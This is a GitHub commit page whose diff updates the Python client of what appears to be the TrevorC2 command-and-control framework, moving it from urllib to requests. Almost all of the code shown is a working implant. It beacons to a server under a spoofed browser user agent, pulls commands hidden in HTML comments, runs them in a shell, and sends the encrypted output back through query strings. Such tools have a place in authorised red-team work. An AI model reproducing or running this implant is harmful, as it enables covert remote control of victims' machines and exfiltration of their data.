Skip to content

Commit

Permalink
Added requests support
Browse files Browse the repository at this point in the history
- Replaced urllib by requests
- Wrapped the "stdout_value" with an "str" function to allow concatenation. Because the "Popen" function return a "byte" string in python3.
  • Loading branch information
nasbench committed May 22, 2021
1 parent 1a39a2a commit 29706d8
Showing 1 changed file with 9 additions and 36 deletions.
45 changes: 9 additions & 36 deletions agents/trevorc2_client.py
Expand Up @@ -36,12 +36,8 @@


# python 2/3 compatibility, need to move this to python-requests in future
try:
import urllib2 as urllib
py = "2"
except:
import urllib.request, urllib.parse, urllib.error
py = "3"

import requests
import random
import base64
import time
Expand All @@ -51,7 +47,6 @@
from Crypto.Cipher import AES
import sys
import platform
import cookielib

# AES Support for Python2/3 - http://depado.markdownblog.com/2015-05-11-aes-cipher-with-python-3-x
class AESCipher(object):
Expand Down Expand Up @@ -90,6 +85,7 @@ def decrypt(self, enc):
return self._unpad(cipher.decrypt(enc[AES.block_size:])).decode('utf-8')



# establish cipher
cipher = AESCipher(key=CIPHER)

Expand All @@ -99,7 +95,7 @@ def random_interval(time_interval1, time_interval2):
return random.randint(time_interval1, time_interval2)

hostname = platform.node()
cookie = cookielib.CookieJar()
req = requests.session()

def connect_trevor():
# we need to registery our asset first
Expand All @@ -110,16 +106,8 @@ def connect_trevor():
hostname_send = base64.b64encode(hostname_send).decode('utf-8')

# pipe out stdout and base64 encode it then request via a query string parameter
if py == "3":
req = urllib.request.Request(SITE_URL + SITE_PATH_QUERY + "?" + QUERY_STRING + hostname_send, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko'})
opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cookie))
html = urllib.request.urlopen(req).read()
break
else:
req = urllib.Request(SITE_URL + SITE_PATH_QUERY + "?" + QUERY_STRING + hostname_send, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko'})
opener = urllib.build_opener(urllib.HTTPCookieProcessor(cookie))
html = opener.open(req).read()
break
html = req.get(SITE_URL + SITE_PATH_QUERY + "?" + QUERY_STRING + hostname_send, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko'}).text
break

# handle exceptions and pass if the server is unavailable, but keep going
except Exception as error:
Expand All @@ -136,14 +124,7 @@ def connect_trevor():
try:
time.sleep(random_interval(time_interval1, time_interval2))
# request with specific user agent
if py == "3":
req = urllib.request.Request(SITE_URL + ROOT_PATH_QUERY, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko'})
opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cookie))
html = urllib.request.urlopen(req).read().decode('utf-8')
else:
req = urllib.Request(SITE_URL + ROOT_PATH_QUERY, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko'})
opener = urllib.build_opener(urllib.HTTPCookieProcessor(cookie))
html = opener.open(req).read().decode('utf-8');
html = req.get(SITE_URL + ROOT_PATH_QUERY, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko'}).text

# <!-- PARAM=bm90aGluZw== --></body> - What we split on here on encoded site
parse = html.split("<!-- %s" % (STUB))[1].split("-->")[0]
Expand All @@ -155,19 +136,11 @@ def connect_trevor():
# execute our parsed command
proc = subprocess.Popen(parse, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout_value = proc.communicate()[0]
stdout_value = cipher.encrypt(hostname + "::::" + stdout_value).encode('utf-8')
stdout_value = cipher.encrypt(hostname + "::::" + str(stdout_value)).encode('utf-8')
stdout_value = base64.b64encode(stdout_value).decode('utf-8')

# pipe out stdout and base64 encode it then request via a query string parameter
if py == "3":
req = urllib.request.Request(SITE_URL + SITE_PATH_QUERY + "?" + QUERY_STRING + stdout_value, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko'})
opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cookie))
html = urllib.request.urlopen(req).read()

else:
req = urllib.Request(SITE_URL + SITE_PATH_QUERY + "?" + QUERY_STRING + stdout_value, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko'})
opener = urllib.build_opener(urllib.HTTPCookieProcessor(cookie))
html = opener.open(req).read()
html = req.get(SITE_URL + SITE_PATH_QUERY + "?" + QUERY_STRING + stdout_value, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko'}).text

# sleep random interval and let cleanup on server side
time.sleep(random_interval(time_interval1, time_interval2))
Expand Down

0 comments on commit 29706d8

Please sign in to comment.